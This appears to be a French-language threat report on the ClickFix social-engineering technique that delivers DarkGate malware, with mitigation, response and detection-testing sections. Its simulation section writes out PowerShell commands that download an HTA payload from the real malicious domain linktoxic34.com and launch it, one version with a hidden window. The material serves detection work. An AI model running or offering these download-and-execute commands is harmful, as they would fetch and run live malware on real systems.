SOC Prime Bias: Medium

16 Dec 2025 18:06 UTC

Étude de Cas ClickFix : Malware DarkGate

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
Étude de Cas ClickFix : Malware DarkGate
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Le rapport décrit une méthode d’ingénierie sociale appelée ClickFix qui incite les utilisateurs à copier et exécuter une commande PowerShell, laquelle télécharge ensuite un fichier HTA malveillant. Ce fichier HTA à son tour télécharge des composants supplémentaires, y compris un script AutoIt qui crée des répertoires, dépose des fichiers et établit des communications C2. L’activité est attribuée à la campagne DarkGate et repose sur l’obfuscation base64 ainsi que la falsification du presse-papiers pour éviter une détection directe.

Enquête

Les analystes ont démêlé plusieurs couches de contenu encodé en base64 intégré dans une fausse page d’alerte d’extension de navigateur et ont récupéré la commande PowerShell responsable de la récupération de dark.hta depuis linktoxic34.com. Lorsque exécuté, le HTA déploie un exécutable AutoIt (fckhffh.a3x) qui exécute une routine DES et lance d’autres charges utiles. La télémétrie réseau capturée montre un trafic HTTP(S) vers le domaine malveillant, suivi par une exécution enchaînée de scripts PowerShell.

Mitigation

Les défenses recommandées incluent la formation des utilisateurs pour les dissuader de copier des extraits de code inconnus, désactiver la boîte de dialogue Exécuter de Windows via les stratégies de groupe et déployer des solutions antivirus basées sur le comportement. Bloquer de manière proactive le domaine malveillant et surveiller les exécutions de PowerShell anormales peut réduire significativement le risque d’infection par DarkGate.

Réponse

Si un événement lié à ClickFix est identifié, isolez le point d’extrémité concerné, arrêtez tous les processus malveillants, retirez les artefacts HTA et AutoIt, et effectuez une analyse forensic sur tous les dossiers créés lors de l’intrusion. Mettez à jour la logique de détection pour signaler les schémas d’exécution PowerShell et HTA suspects et assurez-vous que le domaine associé est bloqué dans tout l’environnement.

Flux d’attaque

Exécution de Simulation

Prérequis : Le Vérification Préliminaire de Télémétrie & de Base doit avoir été réussie.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.

  • Narratif d’Attaque & Commandes :
    Un attaquant qui a obtenu un accès de basse-privilège sur un hôte Windows compromis souhaite télécharger une charge utile HTA malveillante utilisée dans la campagne ClickFix. Pour rester discret, l’attaquant utilise PowerShell—un outil natif de Windows—de sorte qu’aucun binaire externe n’est introduit. La commande est exécutée directement dans la console (ou via une tâche planifiée) et inclut l’URL exacte que la règle surveille. Le téléchargement est stocké dans le %TEMP% répertoire de l’utilisateur et est ensuite exécuté via Start-Process.

    $url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $out = "$env:TEMPdark.hta"
    Invoke-WebRequest -Uri $url -OutFile $out
    Start-Process -FilePath $out
  • Script de Test de Régression : (autosuffisant, reproduit les étapes ci-dessus)

    # Simulation de téléchargement de ClickFix HTA – déclenche la règle Sigma
    $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $destPath = "$env:TEMPdark.hta"
    
    try {
        Write-Host "[*] Téléchargement de la charge utile HTA malveillante en cours..."
        Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing
        Write-Host "[+] Téléchargement terminé. Exécution de la charge utile..."
        Start-Process -FilePath $destPath -WindowStyle Hidden
    } catch {
        Write-Error "Échec du téléchargement ou de l'exécution : $_"
    }
  • Commandes de Nettoyage : (supprime le HTA téléchargé et toute instance en cours d’exécution)

    # Supprimer le fichier HTA et terminer tout processus résiduel
    $htaPath = "$env:TEMPdark.hta"
    if (Test-Path $htaPath) {
        Remove-Item $htaPath -Force
        Write-Host "[*] Fichier HTA supprimé."
    }
    # Tuer tout processus qui pourrait avoir été lancé depuis le HTA (exemple générique)
    Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force